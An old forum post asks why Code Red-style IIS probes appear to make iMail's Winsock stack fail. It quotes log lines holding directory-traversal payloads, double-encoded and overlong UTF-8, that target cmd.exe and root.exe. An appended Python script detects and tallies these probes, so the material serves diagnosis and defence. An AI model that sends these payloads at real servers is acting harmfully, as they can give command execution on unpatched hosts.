After loading 7.06 HF2 I still have the problem with iMail causing the winsock error that requires iMail to be restarted. I thought HF2 might fix this. To recap, I see in the http log requests of the form:

20020307 234337 Info - 192.168.1.1 GET /scripts/root.exe?/c+dir HTTP/1.0.
20020307 234340 Info - 192.168.1.1 GET /MSADC/root.exe?/c+dir HTTP/1.0.
20020307 234346 Info - 192.168.1.1 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234349 Info - 192.168.1.1 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234352 Info - 192.168.1.1 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
20020307 234355 Info - 192.168.1.1 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234358 Info - 192.168.1.1 GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234401 Info - 192.168.1.1 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234404 Info - 192.168.1.1 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234408 Info - 192.168.1.1 GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234411 Info - 192.168.1.1 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234414 Info - 192.168.1.1 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234417 Info - 192.168.1.1 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234420 Info - 192.168.1.1 GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234424 Info - 192.168.1.1 GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234427 Info - 192.168.1.1 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0.

This "request set" happens about four times a day from different external IP addresses. My understanding is that this is a Code Red (or variant) attack trying to target IIS web server. Eventually I see Winsock errors in the log which start out slow but then are constant:

20020315 072553 Socket Error - 192.168.1.1 Error while writing sockect due to error 10053 or malicious connection type.
20020315 072553 Socket Error - 192.168.1.1 Error while writing sockect due to error 10053 or malicious connection type.
20020315 072553 Socket Error - 192.168.1.1 Error while writing sockect due to error 10053 or malicious connection type.
...
...
20020316 221525 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.
20020316 221626 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.
20020316 221726 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.
20020316 221827 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.

At this point iMail needs to be restarted. A restart is required about every 3 days. I don't understand why infrequent malicious connection attempts would cause iMail to corrupt the Winsock stack. How are other people dealing with this?

Also, note the spelling error "sockect".

Dan
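
An added example, not part of the original post and not Ipswitch code: a Python triage of the log format quoted above that peels nested percent-encoding, flags the cmd.exe/root.exe probe requests per source IP, and tallies Winsock error codes. The regexes assume the line layout shown in the post, and the sample lines are constructed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample in the log layout quoted in the post (not real traffic).
SAMPLE = """\
20020307 234337 Info - 192.168.1.1 GET /scripts/root.exe?/c+dir HTTP/1.0.
20020307 234352 Info - 192.168.1.1 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
20020307 234411 Info - 192.168.1.1 GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234417 Info - 192.168.1.1 GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0.
20020307 234500 Info - 192.168.1.7 GET /index.html HTTP/1.0.
20020316 221525 Socket Error - 192.168.1.6 Error while writing sockect due to error 10055 or malicious connection type.
"""

# Assumed layout: "<date> <time> Info - <ip> GET <target> ..."
REQ = re.compile(r"^\d{8} \d{6} Info - (\S+) GET (\S+)")
# Winsock codes seen in the post: 10053 = WSAECONNABORTED, 10055 = WSAENOBUFS.
SOCK = re.compile(r"^\d{8} \d{6} Socket Error - \S+ .*\berror (\d+)\b")

def classify(target):
    """Return the reasons a request target looks like an IIS shell probe."""
    reasons, raw = set(), target.encode("latin-1", "replace")
    for depth in range(4):                    # peel nested percent-encoding
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        if depth >= 1:                        # needed a second decoding pass
            reasons.add("multi-encoded")
        raw = decoded
    if b"\xc0" in raw or b"\xc1" in raw:      # lead bytes never valid in UTF-8
        reasons.add("overlong-utf8")
    path = raw.split(b"?", 1)[0].lower()
    if path.endswith((b"/cmd.exe", b"/root.exe")):
        reasons.add("shell-binary")
    if b"../" in path or b"..\\" in path:
        reasons.add("traversal")
    return reasons

def triage(log_text):
    """Group probe reasons by source IP and tally Winsock error codes."""
    probes, sock_errors = defaultdict(Counter), Counter()
    for line in log_text.splitlines():
        if (m := REQ.match(line)):
            for reason in classify(m.group(2)):
                probes[m.group(1)][reason] += 1
        elif (m := SOCK.match(line)):
            sock_errors[m.group(1)] += 1
    return dict(probes), sock_errors

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Comparing the per-IP probe timestamps with the first appearance of each Winsock code shows whether the socket errors actually follow the probe sets or build up independently of them.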
